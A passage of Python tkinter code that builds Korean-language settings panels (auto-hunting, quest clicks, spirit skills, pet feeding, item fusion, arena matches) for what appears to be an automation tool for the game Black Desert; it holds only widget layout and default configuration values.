check_box = ttk.Checkbutton(
master = frame,
text = '잠재력 돌파, 수정 장착된 장비 포함',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek'],
style = 'sell_jamjeryoek.TCheckbutton',
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_head.pack(anchor=tkinter.W)
# +-----------------------------------------+
# | |
# | 자동 사냥2 |
# | |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['hunt2_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='자동 사냥 시작 행동 설정')
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'].trace(
'w', lambda *args: self.callback_hunt_quest_click_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'] = 0
frame = ttk.Frame(frame_label)
select_quest_location_list = [
('아무 행동도 하지 않기', 0),
('퀘스트 슬롯 1 번 클릭', 1),
('퀘스트 슬롯 2 번 클릭', 2),
('퀘스트 슬롯 3 번 클릭', 3),
('퀘스트 슬롯 4 번 클릭', 4),
]
for text, mode in select_quest_location_list:
combo_box = ttk.Radiobutton(
master = frame,
text = text,
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'],
value = mode
)
combo_box.pack()
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame = ttk.Frame(frame_label)
select_quest_location_list = [
('1 번 위치로 자동 이동', 5),
('2 번 위치로 자동 이동', 6),
('3 번 위치로 자동 이동', 7),
]
for text, mode in select_quest_location_list:
combo_box = ttk.Radiobutton(
master = frame,
text = text,
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'],
value = mode
)
combo_box.pack()
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 스킬')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean'].trace(
'w', lambda *args: self.callback_jadong_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean')
)
if not lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '흑정령 스킬을 사용합니다',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
for i in range(len(LYBBlackDesert.ddolmani_skill_list)):
frame = ttk.Frame(frame_label)
skill_name = "%s" % self.preformat_cjk(LYBBlackDesert.ddolmani_skill_list[i], 18)
label = ttk.Label(
master = frame,
text = skill_name + ':'
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(i)] = tkinter.StringVar(frame)
if i == 0:
self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(i)].trace(
'w', lambda *args: self.callback_ddolmani_skill_0_stringvar(args, lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(0))
)
elif i == 1:
self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(i)].trace(
'w', lambda *args: self.callback_ddolmani_skill_1_stringvar(args, lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(1))
)
elif i == 2:
self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(i)].trace(
'w', lambda *args: self.callback_ddolmani_skill_2_stringvar(args, lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(2))
)
combobox_list = []
for j in range(0, 300, 5):
combobox_list.append(str(j))
if not lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(i) in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(i)] = 90
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(i)],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(i)])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.NW)
frame_head.pack(anchor=tkinter.W)
# +-----------------------------------------+
# | |
# | 작업 설정 |
# | |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['work_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='메인 퀘스트')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean'].trace(
'w', lambda *args: self.callback_jadong_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '메인 퀘스트 진행 중에 전투 태세를 [자동]으로 강제 유지합니다',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='캐릭터 변경')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "접속 캐릭터 슬롯 번호(맨 위가 1번):"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'].trace(
'w', lambda *args: self.callback_chracter_change_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change')
)
combobox_list = []
for i in range(1, 8):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'] = 1
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "번"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='마우스 클릭')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "X 좌표:"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'].trace(
'w', lambda *args: self.callback_location_x_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'location_x')
)
combobox_list = []
for i in range(1, 640):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK + 'location_x' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'] = 320
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = " "
)
label.pack(side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "Y 좌표:"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'].trace(
'w', lambda *args: self.callback_location_y_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'location_y')
)
combobox_list = []
for i in range(1, 360):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK + 'location_y' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'] = 100
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = " "
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='캐릭터 이동')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "방향: "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'].trace(
'w', lambda *args: self.callback_character_move_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'character_move')
)
combobox_list = LYBBlackDesert.character_move_list
if not lybconstant.LYB_DO_STRING_BD_WORK + 'character_move' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = " "
)
label.pack(side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "이동 시간: "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'].trace(
'w', lambda *args: self.callback_character_move_time_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time')
)
combobox_list = []
for i in range(0, 361):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'] = 0
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='반려동물 - 먹이주기')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "현재 보유 중인 펫의 수: "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PET + 'number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PET + 'number'].trace(
'w', lambda *args: self.callback_pet_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_PET + 'number')
)
combobox_list = []
for i in range(1, 21):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_PET + 'number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PET + 'number'] = 1
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PET + 'number'],
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PET + 'number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 - 검은 기운')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "무기/방어구는 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'].trace(
'w', lambda *args: self.callback_geomungiun_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun')
)
combobox_list = LYBBlackDesert.geomun_rank_list
if not lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하, 장신구는 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'].trace(
'w', lambda *args: self.callback_geomungiun2_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하 자동 선택"
)
label.pack(side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 - 수정 합성')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'].trace(
'w', lambda *args: self.callback_sujeong_hapseong_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong')
)
combobox_list = LYBBlackDesert.sujeong_rank_list
if not lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto'].trace(
'w', lambda *args: self.callback_sujeong_hapseong_auto_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '자동',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 - 광원석 합성')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'].trace(
'w', lambda *args: self.callback_gwangwonseok_hapseong_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong')
)
combobox_list = LYBBlackDesert.sujeong_rank_list
if not lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto'].trace(
'w', lambda *args: self.callback_gwangwonseok_hapseong_auto_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '자동',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 - 잠재력 돌파')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'].trace(
'w', lambda *args: self.callback_jamjeryeok_dolpa_rank_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank')
)
combobox_list = LYBBlackDesert.jamjeryeok_dolpa_rank_list
if not lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'] = combobox_list[1]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 6,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'].trace(
'w', lambda *args: self.callback_jamjeryeok_dolpa_rank_order_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order')
)
combobox_list = LYBBlackDesert.jamjeryeok_dolpa_rank_order_list
if not lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'] = combobox_list[1]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급부터 사용"
)
label.pack(side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='토벌 게시판')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "토벌 임무 준비할 때 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'].trace(
'w', lambda *args: self.callback_tobeol_degrade_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'] = 0
combobox_list = []
for i in range(0, 11):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'],
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "단계 낮춰서 시작합니다"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='투기장')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'].trace(
'w', lambda *args: self.callback_daejeon_count_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count')
)
combobox_list = []
for i in range(1, 1001):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'] = 10
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'],
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "회 진행하고 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'].trace(
'w', lambda *args: self.callback_daejeon_match_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match')
)
combobox_list = []
for i in range(0, 60, 5):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'] = 30
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'],
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초 후 매칭 취소하고 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'].trace(
'w', lambda *args: self.callback_daejeon_giveup_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup')
)
combobox_list = []
for i in range(0, 601, 5):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'] = 0
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'],
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
